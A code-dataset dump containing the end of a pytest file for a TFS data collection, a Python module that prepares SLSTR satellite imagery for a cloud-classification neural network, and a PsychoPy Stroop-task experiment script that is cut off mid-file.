c[\"file_x\"])\n\n # Setting\n c.nofile_y = c.file_y\n assert_frame_equal(c.nofile_y, c.file_y)\n\n c[\"nofile_y\"] = c.file_x\n assert_frame_equal(c.nofile_y, c.file_x)\n\n c.nofile[\"y\"] = c.file_y\n assert_frame_equal(c.nofile_y, c.file_y)\n\n c.nofile[\"Y\"] = c.file_x\n assert_frame_equal(c.nofile_y, c.file_x)\n\n def test_index(self, _input_dir_pathlib: pathlib.Path, _tfs_x: TfsDataFrame):\n c = CollectionTest(_input_dir_pathlib)\n c.INDEX = \"S\"\n assert all(c.filex.index == _tfs_x[\"S\"])\n\n def test_defined_properties(self, _input_dir_pathlib: pathlib.Path):\n c = CollectionTest(_input_dir_pathlib)\n exist_properties = {\"file_x\", \"file_y\", \"filex\", \"nofile_x\", \"nofile_y\"}\n assert set(c.defined_properties) == exist_properties\n\n def test_maybe(self, _input_dir_pathlib: pathlib.Path):\n def _test_fun(df, a, b):\n return df.BPMCOUNT, a + b\n\n c = CollectionTest(_input_dir_pathlib)\n res_no = c.maybe_call.nofile_x(_test_fun, 10, 20)\n assert res_no is None\n\n res_file = c.maybe_call.file_x(_test_fun, 10, 20)\n assert res_file[0] == 9\n assert res_file[1] == 30\n\n # same but with item:\n res_file = c.maybe_call.file[\"x\"](_test_fun, 5, 8)\n assert res_file[0] == 9\n assert res_file[1] == 13\n\n def test_buffer_clear(self, _dummy_collection):\n _dummy_collection._buffer[\"some_key\"] = 5\n assert _dummy_collection._buffer[\"some_key\"]\n _dummy_collection.clear()\n assert not _dummy_collection._buffer\n\n def test_no_attribute(self, _dummy_collection):\n with pytest.raises(AttributeError):\n _ = _dummy_collection.absent_attribute\n\n\ndef _read_tfs(path):\n \"\"\" Reads tfs like in _load_tfs() of the collection (here we know we have NAME in tfs). 
\"\"\"\n return read_tfs(path).set_index(\"NAME\", drop=False)\n\n\n@pytest.fixture()\ndef _tfs_x() -> TfsDataFrame:\n return _read_tfs(INPUT_DIR / \"file_x.tfs\")\n\n\n@pytest.fixture()\ndef _tfs_y() -> TfsDataFrame:\n return _read_tfs(INPUT_DIR / \"file_y.tfs\")\n\n\n@pytest.fixture()\ndef _input_dir_pathlib() -> pathlib.Path:\n return INPUT_DIR\n\n\n@pytest.fixture()\ndef _input_dir_str() -> str:\n return str(INPUT_DIR)\n\n\n@pytest.fixture()\ndef _dummy_collection() -> TfsCollection:\n return TfsCollection(\"\")\n","sub_path":"tests/test_collection.py","file_name":"test_collection.py","file_ext":"py","file_size_in_byte":10931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"225990459","text":"'''This module is designed to contain all the relevant methods needed to\r\n preprocess images for training, produce random or synthetic data to\r\n test a network and process other images so that the network can classify\r\n the image data.'''\r\n\r\nfrom satpy import Scene\r\nimport numpy as np\r\nfrom glob import glob\r\nfrom os.path import expanduser, join\r\nfrom PIL import Image\r\nfrom trollimage.xrimage import XRImage\r\nimport time as t\r\n\r\n\r\nclass DataProcessor(object):\r\n \"\"\"Data processor object. Takes the path to the data as stored locally and\r\n the datafile (folder of SLSTR data) to create a dataset from the given\r\n channels, called parameters. The dataset can be flattened and normalised\r\n for use with a neural network. 
The bayesian cloud mask is always used to\r\n produce training and test data, as it is the better of the two provided\r\n masks with SLSTR data.\r\n \"\"\"\r\n\r\n def __init__(self, datapath, datafile, input_channels,\r\n normalise=True, flatten=True,\r\n whiteness=False, temp_ratios=False,\r\n averages=False, angles=False):\r\n # Load the data set (not the values) from the data folder using the\r\n # path to the file\r\n self.load_dataset(datapath, datafile)\r\n # instantiate the parameters that need to be looked at\r\n self.flatten = flatten\r\n self.parameters = input_channels\r\n self.white = whiteness\r\n self.T_ratios = temp_ratios\r\n self.avg = averages\r\n self.channels = []\r\n self.geometry = []\r\n for parameter in self.parameters:\r\n if 'longitude' not in parameter and 'latitude' not in parameter:\r\n self.channels.append(parameter)\r\n else:\r\n self.geometry.append(parameter)\r\n # create the data object, containing all data we'll need to process\r\n self.data = {}\r\n # for each parameter, update the dictionary with the data\r\n for parameter in self.parameters:\r\n # keys are parameters, values are flattened arrays of values\r\n data = self.load_data(parameter)[1]\r\n if parameter in ['S1_an', 'S2_an', 'S3_an', 'S4_an', 'S5_an', 'S6_an']:\r\n data = self.regrid_500_to_1000(data)\r\n if flatten:\r\n self.data.update({parameter: data.flatten()})\r\n else:\r\n self.data.update({parameter: data})\r\n if angles:\r\n angles_array = self.create_angles_array()\r\n self.geometry.append('angles')\r\n if flatten:\r\n angles_array = angles_array.flatten()\r\n self.data.update({'angles': angles_array})\r\n # Format the Bayesian mask to a binary array for training, etc.\r\n og_mask = self.load_data('bayes_in')[1]\r\n bin_mask = self.binary_mask(og_mask)\r\n if flatten:\r\n bin_mask = bin_mask.flatten()\r\n self.cloud_mask = {'bayes_in': bin_mask}\r\n # this variable will contain hard-coded values of the values to\r\n # normalise each respective channel against 
and an offset to be added\r\n # to the original values in each channel.\r\n self.normalisation_values = {'S1_an': [100,0.],\r\n 'S2_an': [100,0.],\r\n 'S3_an': [100,0.],\r\n 'S4_an': [100,0.],\r\n 'S5_an': [100,0.],\r\n 'S6_an': [100,0.],\r\n 'S7_in': [150.,-200.],\r\n 'S8_in': [150.,-200.],\r\n 'S9_in': [150.,-200.]}\r\n if normalise:\r\n self.normalise_data()\r\n if self.white or self.T_ratios or self.avg:\r\n self.ancillary_information_addition(whiteness=self.white,\r\n ratio_temperatures=self.T_ratios,\r\n averages=self.avg)\r\n\r\n def load_dataset(self, datapath, datafile):\r\n \"\"\" This function uses an input datapath and datafile name to fetch the\r\n set of data\r\n\r\n :param datapath: str type. The path to the datafile\r\n :param datafile: str type. The name of the datafile\r\n :return: None\r\n \"\"\"\r\n # define the head using the path\r\n head = expanduser(datapath)\r\n # find out the filenames\r\n filenames = glob(join(head, datafile))\r\n # create a variable to hold the dataset\r\n self.global_scene = Scene(reader=\"nc_slstr\", filenames=filenames)\r\n # useful variable containing all possible data that can be fetched\r\n self.available_data = self.global_scene.available_dataset_names()\r\n\r\n def load_data(self, channel):\r\n \"\"\" Loads data from the dataset (self.global_scene) for a\r\n specific channel or parameter\r\n\r\n :param channel: str type. Should be a valid channel as given by\r\n self.available_data\r\n :return: tuple type. 
data is the data object, data.values is a np.array\r\n of data values\r\n \"\"\"\r\n # try statement just in case we can't actually load the data for some\r\n # reason\r\n try:\r\n self.global_scene.load([channel])\r\n data = self.global_scene.datasets[channel]\r\n # Catch KeyErrors to tell us that the data can't be loaded\r\n except KeyError:\r\n raise Exception('Cannot load data from: {}'.format(channel))\r\n return data, data.values\r\n\r\n def regrid_1000_to_500(self, array):\r\n \"\"\" Regrids a 1000m resolution image to a 500m resolution image by\r\n quadrupling the number of pixels such that one 500m pixel goes to\r\n 4 of the same.\r\n\r\n :param array: np.ndarray type. Array to be regridded\r\n :return: np.ndarray type. Regridded array\r\n \"\"\"\r\n # initial number of rows\r\n row_init = np.shape(array)[0]\r\n # final number of rows\r\n row_fin = 2 * row_init\r\n # initial number of columns\r\n col_init = np.shape(array)[1]\r\n # final number of columns\r\n col_fin = 2 * col_init\r\n # repeat the columns\r\n rep_entries = np.repeat(array, 2)\r\n # reshape the flattened output\r\n array2 = np.reshape(rep_entries, [row_init, col_fin])\r\n # repeat the rows\r\n rep_row = np.tile(array2, (1, 2))\r\n # reshape the rows\r\n regrided = np.reshape(rep_row, [row_fin, col_fin])\r\n return regrided\r\n\r\n def regrid_500_to_1000(self, array):\r\n '''Regrids a 500m resolution image to a 1000m resolution image by\r\n decreasing the number of pixels by a factor of 4 such that four\r\n 500m pixel go to 1 averaged value pixel of the same.\r\n\r\n :param a: np.ndarray type. 
Input array to be converted.\r\n :return: Converted array\r\n '''\r\n shape = (int(array.shape[0] / 2),\r\n array.shape[0] // int(array.shape[0] / 2),\r\n int(array.shape[1] / 2),\r\n array.shape[1] // int(array.shape[1] / 2))\r\n return array.reshape(shape).mean(-1).mean(1)\r\n\r\n def binary_mask(self, array):\r\n '''Formats input Bayesian mask array into a binary array.\r\n\r\n :param array: np.ndarray type. The Bayesian mask to be converted.\r\n :return: np.ndarray type. The binary mask\r\n '''\r\n non_zero = array != 0\r\n array[non_zero] = 1\r\n return array.astype(int)\r\n\r\n def scale_data(self, data, offset=0., factor=1.):\r\n \"\"\" For given input data, this function scales the data by a given\r\n factor\r\n\r\n :param data: numpy.ndarray type. The data to be scaled.\r\n :param offset: float type. Value which is to be added to the original value\r\n of the data.\r\n :param factor: float type. The factor by which to scale the data.\r\n :return: numpy.ndarray type. The scaled data.\r\n \"\"\"\r\n # make sure data is a np.ndarray\r\n if not isinstance(data, np.ndarray):\r\n raise Exception('Data must be in of the type numpy array')\r\n # scale the data\r\n scaled = (data + offset) * np.float32(factor)\r\n return scaled\r\n\r\n def normalise_data(self):\r\n \"\"\" Iterates through all data held by the data object and normalises\r\n them based on hard-coded normalisation factors given in the\r\n noramlisation_factor method\r\n\r\n :return: None\r\n \"\"\"\r\n # only want to iterate over our channels rather than cloud masks\r\n for channel in self.channels:\r\n # get the normalisation factor\r\n norm_factor = 1./ self.normalisation_values[channel][0]\r\n # get the offset value\r\n offset = self.normalisation_values[channel][-1]\r\n # scale the data\r\n norm_data = self.scale_data(self.data[channel], offset, norm_factor)\r\n # update our data\r\n self.data[channel] = norm_data\r\n\r\n def whiteness(self, data):\r\n if 'S1_an' not in self.parameters and 'S2_an' 
not in self.parameters:\r\n raise Exception('Need both S1_an and S2_an for whiteness')\r\n data1, data2 = data['S1_an'], data['S2_an']\r\n mean = data1 + data2 / 2.\r\n data1 -= mean\r\n data1 *= 1./mean\r\n data1 = np.absolute(data1)\r\n data2 -= mean\r\n data2 *= 1./mean\r\n data2 = np.absolute(data2)\r\n whiteness = data1 + data2\r\n return whiteness\r\n\r\n def avg_temp(self, data):\r\n if 'S8_in' not in self.parameters and 'S9_in' not in self.parameters:\r\n raise Exception('Need both S8_in and S9_in for average temperature')\r\n data1 = data['S8_in']\r\n data2 = data['S9_in']\r\n temp = data1 + data2\r\n avg_temp = temp/2.\r\n return avg_temp\r\n\r\n def temp_ratio(self, data):\r\n if 'S8_in' not in self.parameters and 'S9_in' not in self.parameters:\r\n raise Exception('Need both S8_in and S9_in for temperature ratio')\r\n ratio_dictionary = {}\r\n T = self.avg_temp(data)\r\n for channel in self.channels:\r\n ratio = data[channel]/T\r\n key = channel[:2] + '_temp_ratio'\r\n ratio_dictionary.update({key: ratio})\r\n return ratio_dictionary\r\n\r\n def create_angles_array(self):\r\n orbit_alt = 814.5\r\n counter = 0\r\n\r\n def processed_angle(distance):\r\n global counter\r\n angle = np.arctan(distance / orbit_alt) * (180. 
/ np.pi)\r\n if np.isnan(angle):\r\n counter += 1\r\n return angle\r\n\r\n distances = []\r\n for i in range(749, -1, -1):\r\n distances.append(i)\r\n for i in range(750):\r\n distances.append(i)\r\n distances = np.array(distances)\r\n angles = []\r\n for distance in distances:\r\n angles.append(processed_angle(distance))\r\n array_of_angles = np.zeros((1200, 1500))\r\n for i in range(1500):\r\n array_of_angles[:, i] = np.full(1200, angles[i])\r\n return array_of_angles\r\n\r\n def ancillary_information_addition(self, whiteness=True,\r\n ratio_temperatures=True,\r\n averages=True):\r\n print('Adding extra datasets...')\r\n if averages:\r\n channels = self.channels.copy()\r\n for key in channels:\r\n data = self.data[key]\r\n avg = np.nanmean(data)\r\n average_ratio = np.full(data.shape, float(avg))\r\n self.data.update({str(key + '_average'): average_ratio})\r\n self.channels.append(str(key + '_average'))\r\n if whiteness:\r\n whiteness_test = self.whiteness(self.data)\r\n self.channels.append('whiteness')\r\n self.data.update({'whiteness': whiteness_test})\r\n if averages:\r\n avg = np.nanmean(whiteness_test)\r\n average_whiteness = np.full(whiteness_test.shape, float(avg))\r\n self.data.update({'whiteness_average': average_whiteness})\r\n self.channels.append('whiteness_average')\r\n if ratio_temperatures:\r\n ratio_dictionary = self.temp_ratio(self.data)\r\n for key in ratio_dictionary.keys():\r\n self.channels.append(key)\r\n data = ratio_dictionary[key]\r\n self.data.update({key: data})\r\n if averages:\r\n avg = np.nanmean(data)\r\n average_ratio = np.full(data.shape, float(avg))\r\n self.data.update({key+'_average': average_ratio})\r\n self.channels.append(key+'_average')\r\n print('Done')\r\n\r\n def create_random_data(self, fraction_for_training=0.5, for_nn=True):\r\n '''Using the input channels as references, generates arrays of\r\n normally distributerd data with a mean of the global mean\r\n the input channel and a standard deviation of the input\r\n 
channel's standard deviation.\r\n NB// If the data has not been flattened, will return two\r\n arrays of input and mask that are the shape of the\r\n bayesian mask.\r\n\r\n :param fraction_for_training: float type. The fraction of data\r\n that should be used for training.\r\n :return\r\n '''\r\n print('Generating randomised data...')\r\n start = t.time()\r\n random_data = {}\r\n for channel in self.channels and self.geometry:\r\n og_data = self.data[channel]\r\n mean = np.nanmean(og_data)\r\n std = np.nanstd(og_data)\r\n norm_data = np.random.normal(loc=mean,\r\n scale=2.*std,\r\n size=og_data.shape)\r\n key = channel + '_randomised'\r\n random_data.update({key: norm_data})\r\n rand_mask = np.random.randint(low=0,\r\n high=2,\r\n size=self.cloud_mask['bayes_in'].shape)\r\n random_data.update({'mask_randomised': rand_mask})\r\n final = []\r\n for coord in np.ndindex(rand_mask.shape):\r\n input_vector = np.zeros(len(random_data))\r\n p = 0\r\n for key in random_data.keys():\r\n input_vector[p] = random_data[key][coord]\r\n p += 1\r\n final.append(input_vector)\r\n cutoff = int(len(final) * fraction_for_training)\r\n final = np.asarray(final)\r\n data, mask = final[:,:-1], final[:,-1].astype(int)\r\n train_in, test_in = data[:-cutoff], data[-cutoff:]\r\n train_mask, test_mask = mask[:-cutoff], mask[-cutoff:]\r\n if for_nn:\r\n print('Time to create randomised data: ' + str(round((t.time() - start), 2)) + 's')\r\n return train_in, train_mask, test_in, test_mask\r\n print('Time to create randomised data: ' + str(round((t.time() - start), 2)) + 's')\r\n data = data.reshape(rand_mask.shape[0],\r\n rand_mask.shape[-1],\r\n len(random_data))\r\n mask = mask.reshape(rand_mask.shape[0],\r\n rand_mask.shape[-1],\r\n len(random_data))\r\n return data, mask\r\n\r\n def track_and_remove_NaNs(self, data):\r\n '''Takes an input array and tracks all the NaN values\r\n in a boolean array where True is where a NaN value is.\r\n Returns this boolean array along with the original\r\n 
array, but now flattened with all the NaNs removed.\r\n\r\n :param data: np.ndarray type. Input array to be tracked\r\n and corrected.\r\n :return:\r\n '''\r\n if len(data.shape) == 2:\r\n where_nans = np.isnan(data).any(axis=1)\r\n corrected_data = np.delete(data, np.where(where_nans), axis=0)\r\n return where_nans, corrected_data\r\n if len(data.shape) == 3:\r\n where_nans = np.isnan(data).any(axis=2)\r\n flattened = data.reshape((data.shape[0] * data.shape[1]), data.shape[-1])\r\n flat_where_nans = np.isnan(flattened).any(axis=1)\r\n corrected_data = np.delete(flattened, np.where(flat_where_nans), axis=0)\r\n return where_nans, corrected_data\r\n\r\n def create_synthetic_data(self, fraction_for_training=0.5, shuffle=True, for_nn=True):\r\n \"\"\"Uses all of the data from all parameters to create training and\r\n validation sets. The training data is\r\n\r\n :param fraction_for_training: float type. The fraction of data\r\n that should be used for training.\r\n :param shuffle: bool type. 
If True, randomly shuffles the data.\r\n :return:\r\n \"\"\"\r\n print('Generating synthetic data...')\r\n start = t.time()\r\n input_vector_length = len(self.channels)+len(self.geometry)\r\n complete_data = []\r\n for coord in np.ndindex(self.cloud_mask['bayes_in'].shape):\r\n input_vector = np.zeros(input_vector_length+1)\r\n p = 0\r\n for key in self.data.keys():\r\n input_vector[p] = self.data[key][coord]\r\n p += 1\r\n if (input_vector[0] >= 39.23 and input_vector[1] >= 39.69\r\n and input_vector[2] >= 273.15 and input_vector[3] >= 273.15):\r\n input_vector[-1] = 1\r\n complete_data.append(input_vector)\r\n cutoff = int(len(complete_data) * fraction_for_training)\r\n complete_data = np.asarray(complete_data)\r\n if shuffle:\r\n np.random.shuffle(complete_data)\r\n if for_nn:\r\n corrected_data = self.track_and_remove_NaNs(complete_data)\r\n data, mask = corrected_data[-1][:, :-1], corrected_data[-1][:, -1].astype(int)\r\n train_in, test_in = data[:-cutoff], data[-cutoff:]\r\n train_mask, test_mask = mask[:-cutoff], mask[-cutoff:]\r\n print('Time to create synthetic data: ' + str(round((t.time() - start), 2)) + 's')\r\n return train_in, train_mask, test_in, test_mask\r\n complete_data = complete_data.reshape(self.cloud_mask['bayes_in'].shape[0],\r\n self.cloud_mask['bayes_in'].shape[1],\r\n (input_vector_length + 1))\r\n data, mask = complete_data[:, :-1], complete_data[:, -1].astype(int)\r\n train_in, test_in = data[:-cutoff], data[-cutoff:]\r\n train_mask, test_mask = mask[:-cutoff], mask[-cutoff:]\r\n print('Time to create synthetic data: ' + str(round((t.time() - start), 2)) + 's')\r\n return train_in, train_mask, test_in, test_mask\r\n\r\n def create_training_data(self, fraction_for_training=0.5, shuffle=True, for_nn=True):\r\n \"\"\"Uses all of the data from all parameters to create training and\r\n validation sets.\r\n\r\n :param fraction_for_training: float type. The fraction of data\r\n that should be used for training.\r\n :param shuffle: bool type. 
If True, randomly shuffles the data.\r\n :return:\r\n \"\"\"\r\n print('Generating training data...')\r\n start = t.time()\r\n input_vector_length = len(self.channels)+len(self.geometry)\r\n complete_data = []\r\n for coord in np.ndindex(self.cloud_mask['bayes_in'].shape):\r\n input_vector = np.zeros(input_vector_length + 1)\r\n p = 0\r\n for key in self.data.keys():\r\n input_vector[p] = self.data[key][coord]\r\n p += 1\r\n input_vector[-1] = self.cloud_mask['bayes_in'][coord]\r\n complete_data.append(input_vector)\r\n cutoff = int(len(complete_data) * fraction_for_training)\r\n complete_data = np.asarray(complete_data)\r\n if shuffle:\r\n np.random.shuffle(complete_data)\r\n if for_nn:\r\n corrected_data = self.track_and_remove_NaNs(complete_data)\r\n data, mask = corrected_data[-1][:, :-1], corrected_data[-1][:, -1].astype(int)\r\n train_in, test_in = data[:cutoff], data[cutoff:]\r\n train_mask, test_mask = mask[:cutoff], mask[cutoff:]\r\n print('Time to create training data: ' + str(round((t.time() - start), 2)) + 's')\r\n return train_in, train_mask, test_in, test_mask\r\n complete_data = complete_data.reshape(self.cloud_mask['bayes_in'].shape[0],\r\n self.cloud_mask['bayes_in'].shape[1],\r\n (input_vector_length+1))\r\n data, mask = complete_data[:, :-1], complete_data[:, -1].astype(int)\r\n train_in, test_in = data[:cutoff], data[cutoff:]\r\n train_mask, test_mask = mask[:cutoff], mask[cutoff:]\r\n print('Time to create training data: ' + str(round((t.time() - start), 2)) + 's')\r\n return train_in, train_mask, test_in, test_mask\r\n\r\n def prep_image(self, filepath, save_data=False):\r\n '''Prepares an image for classification by the ANN. 
As the data is\r\n compacted and flattened by removing NaNs,\r\n\r\n :param filenames:\r\n :param filepath:\r\n :return:\r\n '''\r\n print('Preparing image for classification...')\r\n start = t.time()\r\n input_vector_length = len(self.channels)+len(self.geometry)\r\n complete_data = []\r\n for coord in np.ndindex(self.cloud_mask['bayes_in'].shape):\r\n input_vector = np.zeros(input_vector_length)\r\n p = 0\r\n for key in self.data.keys():\r\n input_vector[p] = self.data[key][coord]\r\n p += 1\r\n complete_data.append(input_vector)\r\n complete_data = np.asarray(complete_data)\r\n corrected_data = self.track_and_remove_NaNs(complete_data)\r\n where_nans, flattened_data = corrected_data\r\n if save_data:\r\n datasets = [where_nans, flattened_data]\r\n filenames = ['where_nans', 'prepared_data']\r\n self.save_data(filenames=filenames,\r\n filepath=filepath,\r\n datasets=datasets)\r\n print('Time to prepare and save image data: ' +\r\n str(round((t.time() - start), 2)) + 's')\r\n else:\r\n print('Time to prepare image data: '\r\n + str(round((t.time() - start), 2)) + 's')\r\n return where_nans, flattened_data\r\n\r\n def save_data(self, filenames, filepath, datasets):\r\n '''Saves the data as numpy files. Please give the filenames\r\n and the datasets in the right order, i.e. 
1st filename\r\n corresponds to the 1st dataset, etc.\r\n\r\n :param filenames: list type\r\n :param filepath: str type\r\n :param datasets: list type\r\n :return:\r\n '''\r\n if len(filenames) != len(datasets):\r\n raise Exception('Please give the same number of filenames as datasets')\r\n for i in range(len(datasets)):\r\n np.save(join(filepath, filenames[i]), datasets[i])\r\n\r\n def save_images(self, path):\r\n for parameter in self.parameters:\r\n data = self.load_data(parameter)[0]\r\n img = XRImage(data)\r\n img.stretch()\r\n filepath = join( path, str(parameter + '.png'))\r\n img.save(filepath)\r\n","sub_path":"library/datahandling/image_processing.py","file_name":"image_processing.py","file_ext":"py","file_size_in_byte":23537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"352630158","text":"# -*- coding: utf-8 -*-\nfrom psychopy import event, core, data, gui, visual\nfrom fileHandling import *\nimport pdb\nimport numpy as np\n\n\nclass Experiment:\n def __init__(self, win_color):\n self.stimuli_positions = [[-.6,-0.4],[-.3, -0.4], [0, -0.4], [0.3, -0.4],[0.6,-0.4],\n [-.6,-0.2],[-.3, -0.2], [0, -0.2], [0.3, -0.2],[0.6,-0.2],\n [-.6,0],[-.3, 0], [0, 0], [0.3, 0],[0.6,0],\n [-.6,0.2],[-.3, 0.2], [0, 0.2], [0.3, 0.2],[0.6,0.2],\n [-.6,0.4],[-.3, 0.4], [0, 0.4], [0.3, 0.4],[0.6,0.4],]\n self.win_color = win_color\n\n def create_window(self, color=(1, 1, 1)):\n # type: (object, object) -> object\n color = self.win_color\n win = visual.Window(monitor=\"testMonitor\",\n color=color, fullscr=True)\n return win\n\n def settings(self):\n experiment_info = {'Subid': '', 'Age': '', 'Experiment Version': 0.1,\n 'Sex': ['Male', 'Female', 'Other'],\n 'Language': ['French', 'English'], u'date':\n data.getDateStr(format=\"%Y-%m-%d_%H:%M\")}\n\n info_dialog = gui.DlgFromDict(title='Stroop task', dictionary=experiment_info,\n fixed=['Experiment Version'])\n experiment_info[u'DataFile'] = u'Data' + os.path.sep + 
u'stroop_mg.csv'\n\n if info_dialog.OK:\n return experiment_info\n else:\n core.quit()\n return 'Cancelled'\n \n def write_to_file(self,rt1,rt2):\n myCsvRow = '%s;%s;%s;%s;%s;%s;%s\\n' % (settings['Age'],settings['Sex'],rt1,rt2,settings['Language'],settings['date'],settings['Subid'])\n with open(settings[u'DataFile'],'a') as fd:\n fd.write(myCsvRow)\n \n \n def create_text_stimuli(self, text=None, pos=[0.0, 0.0], name='', color='Black'):\n '''Creates a text stimulus,\n '''\n\n text_stimuli = visual.TextStim(win=window, ori=0, name=name,\n text=text, font=u'Arial',\n pos=pos,\n color=color, colorSpace=u'rgb')\n return text_stimuli\n\n def create_trials(self, trial_file, randomization='random'):\n '''Doc string'''\n data_types = ['RT', 'Sub_id', 'Sex']\n with open(trial_file, 'r') as stimfile:\n _stims = csv.DictReader(stimfile)\n trials = data.TrialHandler(list(_stims), 1,\n method=\"random\")\n\n [trials.data.addDataType(data_type) for data_type in data_types]\n\n return trials\n\n def present_stimuli(self, color, text, position, stim):\n _stimulus = stim\n color = color\n position = position\n if settings['Language'] == \"Swedish\":\n text = swedish_task(text)\n else:\n text = text\n _stimulus.pos = position\n _stimulus.setColor(color)\n _stimulus.setText(text)\n return _stimulus\n\n def running_experiment(self, wordlist, testtype):\n _wordlist = wordlist\n testtype = testtype\n timer = core.Clock()\n stimuli = [self.create_text_stimuli(window) for _ in range(26)]\n\n #for trial in _trials:\n # Fixation cross\n fixation = self.present_stimuli('Black', '+', self.stimuli_positions[12],\n stimuli[25])\n fixation.draw()\n window.flip()\n core.wait(1.)\n timer.reset()\n i=0\n for word in wordlist:\n #for i in range(len(self.stimuli_positions)):\n target = self.present_stimuli(word['colour'], word['word'],self.stimuli_positions[i], stimuli[i])\n i+=1\n target.draw()\n # Target word\n #target = self.present_stimuli(trial['colour'], trial['stimulus'],\n # 
self.stimuli_positions[2], stimuli[0])\n #target.draw()\n # alt1\n #alt1 = self.present_stimuli('Black', trial['alt1'],\n # self.stimuli_positions[0], stimuli[1])\n #alt1.draw()\n # alt2\n #alt2 = self.present_stimuli('Black', trial['alt2'],\n # self.stimuli_positions[1], stimuli[2])\n #alt2.draw()\n window.flip()\n\n keys = event.waitKeys(keyList=['space', 'enter'])\n resp_time = timer.getTime()\n #if testtype == 'practice':\n # if keys[0] != trial['correctresponse']:\n # instruction_stimuli['incorrect'].draw()\n\n # else:\n # instruction_stimuli['right'].draw()\n\n # window.flip()\n # core.wait(2)\n\n #if testtype == 'Test1':\n #if keys[0] == trial['correctresponse']:\n # trial['Accuracy'] = 1\n #else:\n # trial['Accuracy'] = 0\n\n \n\n event.clearEvents()\n return resp_time\n\ndef create_instructions_dict(instr):\n start_n_end = [w for w in instr.split() if w.endswith('START') or w.endswith('END')]\n keys = {}\n\n for word in start_n_end:\n key = re.split(\"[END, START]\", word)[0]\n\n if key not in keys.keys():\n keys[key] = []\n\n if word.startswith(key):\n keys[key].append(word)\n return keys\n\n\ndef create_instructions(input, START, END):\n instruction_text = parse_instructions(input, START, END)\n print(instruction_text)\n text_stimuli = visual.TextStim(window, text=instruction_text, wrapWidth=1.2,\n alignHoriz='center', color=\"Black\",\n alignVert='center', height=0.06)\n\n return text_stimuli\n\n\ndef display_instructions(start_instruction='',rt=None):\n # Display instructions\n\n if start_instruction == 'Practice':\n instruction_stimuli['instructions'].pos = (0.0, 0.5)\n instruction_stimuli['instructions'].draw()\n\n positions = [[-.2, 0], [.2, 0], [0, 0]]\n examples = [experiment.create_text_stimuli() for pos in positions]\n example_words = ['green', 'blue', 'green']\n if settings['Language'] == 'Swedish':\n example_words = [swedish_task(word) for word in example_words]\n\n for i, pos in enumerate(positions):\n examples[i].pos = pos\n\n if i == 0:\n 
examples[0].setText(example_words[i])\n\n elif i == 1:\n examples[1].setText(example_words[i])\n\n elif i == 2:\n examples[2].setColor('Green')\n examples[2].setText(example_words[i])\n\n [example.draw() for example in examples]\n\n instruction_stimuli['practice'].pos = (0.0, -0.5)\n instruction_stimuli['practice'].draw()\n\n elif start_instruction == 'Test1':\n instruction_stimuli['instructions1a'].pos = (0.0, 0.3)\n instruction_stimuli['instructions1a'].draw()\n \n positions = [[-.2, 0], [0, 0], [.2, 0]]\n examples = [experiment.create_text_stimuli() for pos in positions]\n example_words = ['blue', 'green', 'yellow'] # \"Blue, Red, Yellow\"\n if settings['Language'] == 'French':\n example_words = ['bleu', 'vert', 'jaune']\n\n for i, pos in enumerate(positions):\n examples[i].pos = pos\n\n if i == 0:\n examples[0].setColor('Blue')\n examples[0].setText(example_words[i])\n\n elif i == 1:\n examples[1].setColor('Red')\n examples[1].setText(example_words[i])\n\n elif i == 2:\n examples[2].setColor('Green')\n examples[2].setText(example_words[i])\n\n [example.draw() for example in examples]\n \n instruction_stimuli['instructions1b'].pos = (0.0, -0.4)\n instruction_stimuli['instructions1b'].draw()\n #instruction_stimuli['test'].draw()\n \n elif start_instruction == 'Test2':\n instruction_stimuli['instructions2a'].pos = (0.0, 0.3)\n instruction_stimuli['instructions2a'].draw()\n \n positions = [0, 0]\n reactionTime = [experiment.create_text_stimuli() for pos in positions]\n #example_words = ['blue', 'green', 'yellow'] # \"Blue, Red, Yellow\"\n \n #if settings['Language'] == 'Swedish':\n # example_words = [swedish_task(word) for word in example_words]\n reactionTime[0].pos = positions\n reactionTime[0].setColor('Black')\n reactionTime[0].setText(np.round(rt,3))\n reactionTime[0].draw()\n \n instruction_stimuli['instructions2b'].pos = (0.0, -0.4)\n instruction_stimuli['instructions2b'].draw()\n #instruction_stimuli['test'].draw()\n \n elif start_instruction == 'End':\n 
instruction_stimuli['done1'].pos = (0.0, 0.3)\n instruction_stimuli['done1'].draw()\n \n positions = [0, 0]\n reactionTime = [experiment.create_text_stimuli() for pos in positions]\n #example_words = ['blue', 'green', 'yellow'] # \"Blue, Red, Yellow\"\n \n #if settings['Language'] == 'Swedish':\n # example_words = [swedish_task(word) for word in example_words]\n reactionTime[0].pos = positions\n reactionTime[0].setColor('Black')\n reactionTime[0].setText(np.round(rt,3))\n reactionTime[0].draw()\n \n instruction_stimuli['done2'].pos = (0.0, -0.4)\n instruction_stimuli['done2'].draw()\n #instruction_stimuli['test'].draw()\n #instruction_stimuli['done'].draw()\n\n window.flip()\n event.waitKeys(keyList=['space'])\n event.clearEvents()\n\n\ndef swedish_task(word):\n swedish = '+'\n if word == \"blue\":\n swedish = u\"blå\"\n\n elif word == \"red\":\n swedish = u\"röd\"\n\n elif word == \"green\":\n swedish = u\"grön\"\n\n elif word == \"yellow\":\n swedish = \"gul\"\n\n return swedish\n\n\nif __name__ == \"__main__\":\n experiment = Experiment(win_color=\"White\")\n settings = experiment.settings()\n language = settings['Language']\n instructions = read_instructions_file(\"INSTRUCTIONS\", language, language + \"End\")\n instructions_dict = create_instructions_dict(instructions)\n instruction_stimuli = {}\n\n window = experiment.create_window(color=(0, 0, 0))\n\n for instruction, (START, END) in instructions_dict.items():\n instruction_stimuli[instruction] = create_instructions(instructions, START, END)\n # We don't want the mouse to show:\n event.Mouse(visible=False)\n \n # Practice Trials\n #display_instructions(start_instruction='Practice')\n\n #practice = experiment.create_trials('practice_list.csv')\n #experiment.running_experiment(practice, testtype='practice')\n # Test trials\n display_instructions(start_instruction='Test1')\n if settings['Language']=='French':\n trials1 = experiment.create_trials('stimuli1_list_fr.csv')\n elif settings['Language']=='English':\n 
